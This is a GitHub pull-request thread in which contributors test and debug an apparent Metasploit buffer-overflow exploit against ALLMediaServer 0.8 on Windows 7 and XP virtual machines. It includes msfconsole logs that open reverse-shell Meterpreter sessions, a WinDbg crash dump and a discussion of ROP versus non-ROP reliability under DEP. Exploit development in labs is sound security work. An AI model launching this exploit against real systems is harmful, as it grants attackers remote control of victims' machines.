New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Review of pull request #606 #607
Conversation
Tested, and worked. Sorry I must have slept away. thanks anyway. |
Hi, I'm sorry for late follow up. This exploit works on my W7 SP1 on my VM, then I tested on another machine, the exploit doesn't work. I tried mine also, and it works. The operating system is still same, latest update from ms. Here is the dump of this exploit (#607):
and here is mine (#606)
msf exploit(allmediaserver_bof) > exploit [] Started reverse handler on 10.10.10.2:4444 meterpreter > sysinfo OS Version: C:\Users\lab> |
Hi modpr0be, Today I'll do new tests on W7 SP1 over VirtualBox and VMware fresh virtual machines. If we cannot confirm exploit reliability on W7SP1 with ROP between virtual/physical machines maybe we'll need to avoid ROP on W7. Since W7 is optin by default could be acceptable :) I'll update with results along the day. |
Hi jvazquez, Ok. Thanks for this. Will do the same test on VMware fresh install. cheers. |
Hi modpr0be, Working on vmware virtual machine: msf exploit(allmediaserver_bof) > set target 1 target => 1 msf exploit(allmediaserver_bof) > set RHOST 192.168.1.137 RHOST => 192.168.1.137 msf exploit(allmediaserver_bof) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.157:4444 [*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English... [*] Sending stage (752128 bytes) to 192.168.1.137 [*] Meterpreter session 3 opened (192.168.1.157:4444 -> 192.168.1.137:49161) at 2012-07-15 15:50:19 +0200 meterpreter > run checkvm [*] Checking if target is a Virtual Machine ..... [*] This is a VMware Virtual Machine meterpreter > sysinfo Computer : WIN-RNJ7NBRK9L7 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > But failing on a virtual box: msf exploit(allmediaserver_bof) > set target 1 target => 1 msf exploit(allmediaserver_bof) > set RHOST 192.168.1.132 RHOST => 192.168.1.132 msf exploit(allmediaserver_bof) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.157:4444 [*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English... msf exploit(allmediaserver_bof) > The crash on the virtual box virtual machine: (ee8.e5c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=019bfd2c ebx=00000000 ecx=00000000 edx=6f62b418 esi=019bfd2c edi=019bfd1c eip=00407cc0 esp=019bf8d4 ebp=019bfd40 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 MediaServer+0x7cc0: 00407cc0 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:6f62b410=???????? 0:006> !exchain 019bf8e8: MediaServer+13444a (0053444a) 019bfd48: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ALLMediaServer\avcodec-53.dll - avcodec_53!avpriv_aac_parse_header+104c (65ec74dc) Invalid exception stack at 539706eb 0:006> bp 65ec74dc 0:006> g Breakpoint 0 hit eax=00000000 ebx=00000000 ecx=65ec74dc edx=778071cd esi=00000000 edi=00000000 eip=65ec74dc esp=019bf4ec ebp=019bf50c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 avcodec_53!avpriv_aac_parse_header+0x104c: 65ec74dc 81c4cc060000 add esp,6CCh 0:006> dd esp + 6cc 019bfbb8 685e8d55 68493408 8031b335 ca8f7708 019bfbc8 0c14b8b8 f37724b7 40434832 4b8492c6 019bfbd8 033d6df7 31974de7 adab911c 9a071121 019bfbe8 09ee7219 654cd442 e7a89d96 50921f67 019bfbf8 e3acef0d 8215297c 02b3a9ca 3a4fdf3b 019bfc08 2acfa068 7aef339a 7923567b 438d7853 019bfc18 ba89a0cf 05fd5780 d2aed9e9 b49a9229 019bfc28 0f14e825 0e6522a3 3dc44977 6df0dd54 0:006> dd esp + 6cc - 150 019bfa68 665a0aa1 665a0aa1 665a0aa1 665a0aa1 019bfa78 665a0aa1 665a0aa1 665a0aa1 665a0aa1 019bfa88 665a0aa1 665a0aa1 665a0aa1 65f6faa7 019bfa98 671ee4e0 6ac1ccb4 667ceedf 70476972 019bfaa8 65f5f09d 65f9830d 6ac1c1d5 00000600 019bfab8 6672a1e2 00000040 665a09df 6ad58a3d 019bfac8 6ac7a771 665a0aa1 6682f9f4 90909090 019bfad8 663dcbd2 00026fe9 53b8ca00 70102cef Ugly :\ Performing more testing.... |
Avoiding ROP exploit makes it work on W7 even on virtualbox: msf exploit(allmediaserver_bof_no_rop) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.157:4444 [*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English... [*] Sending stage (752128 bytes) to 192.168.1.132 [*] Meterpreter session 4 opened (192.168.1.157:4444 -> 192.168.1.132:49221) at 2012-07-15 16:28:40 +0200 meterpreter > sysinfo Computer : JUAN-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > run checkvm [*] Checking if target is a Virtual Machine ..... [*] This is a Sun VirtualBox Virtual Machine meterpreter > Now checking if the exploit with rop is reliable across different virtual machines with Windows XP SP3. I'm thinking in avoiding ROP exploit in the case of W7... anyway it's OptOut and Allmediaserver runs without dep by default. |
Tested successfully with ROP on Virtualbox: msf exploit(allmediaserver_bof) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.157:4444 [*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows XP SP3 - English... [*] Sending stage (752128 bytes) to 192.168.1.133 [*] Meterpreter session 5 opened (192.168.1.157:4444 -> 192.168.1.133:1097) at 2012-07-15 16:35:53 +0200 meterpreter > sysinfo Computer : HOME-DF26FC7444 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > run checkvm [*] Checking if target is a Virtual Machine ..... [*] This is a Sun VirtualBox Virtual Machine meterpreter > Im going to send a new pull request, avoiding ROP in the case of W7 and asking a more experienced developer to agree with the decision :) |
Well, avoiding ROP should be OK then. I've had time now, just finished work, I'll try the test again. |
Hi modpr0be, Feel free to test pull request #608 as patch for the W7 situation until ROP reliable version is built! I'm going to ask a more experienced developer to check. In the meanwhile try to build a ROP chain reliable between environments could be nice, maybe prepending a lot of ROP nops before the rop chain. |
Changes: